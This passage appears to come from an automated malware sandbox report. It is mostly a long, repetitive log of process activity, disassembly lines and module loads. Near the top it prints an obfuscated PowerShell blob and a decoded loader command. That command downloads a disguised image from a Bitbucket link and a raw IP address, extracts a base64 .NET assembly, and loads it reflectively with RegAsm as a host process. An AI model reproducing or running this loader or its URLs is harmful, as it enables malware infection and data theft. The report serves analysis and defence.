$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00424983 push edi; retf ABF4h5_2_004249D2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004098D3 push eax; ret 5_2_004098E5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040214F push esi; ret 5_2_00402179
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040217C push esi; ret 5_2_00402179
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418263 push eax; ret 5_2_0041834D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401A6A push es; ret 5_2_00401A2C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401A79 push ss; ret 5_2_00401A81
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00401A1D push ss; ret 5_2_00401A25
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041834E push eax; ret 5_2_0041834D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041835E push eax; ret 5_2_0041834D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004033F0 push eax; ret 5_2_004033F2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040AC12 push edx; ret 5_2_0040AC17
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041854B push edi; retf 5_2_00418557
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004085DE push FFFFFFCFh; ret 5_2_004085EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00414D86 push esi; iretd 5_2_00414DD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417599 push edx; retf 5_2_0041762D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00414DBC push esi; iretd 5_2_00414DD6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041864E push eax; retf 5_2_00418651
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041761F push edx; retf 5_2_0041762D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041762F push ebp; retf 5_2_0041766B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004016DA push esi; ret 5_2_004016DB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D704 push cs; retf 5_2_0040D71F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004017CB push esi; ret 5_2_004017CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F09AD push ecx; mov dword ptr [esp], ecx5_2_031F09B6
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0357ED3B push edi; retf ABF4h7_2_0357ED8A
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_03572A06 push eax; retf 7_2_03572A09
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_03567ABC push cs; retf 7_2_03567AD7
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_03571951 push edx; retf 7_2_035719E5
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0356F174 push esi; iretd 7_2_0356F18E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_03572903 push edi; retf 7_2_0357290F
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0356F13E push esi; iretd 7_2_0356F18E

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
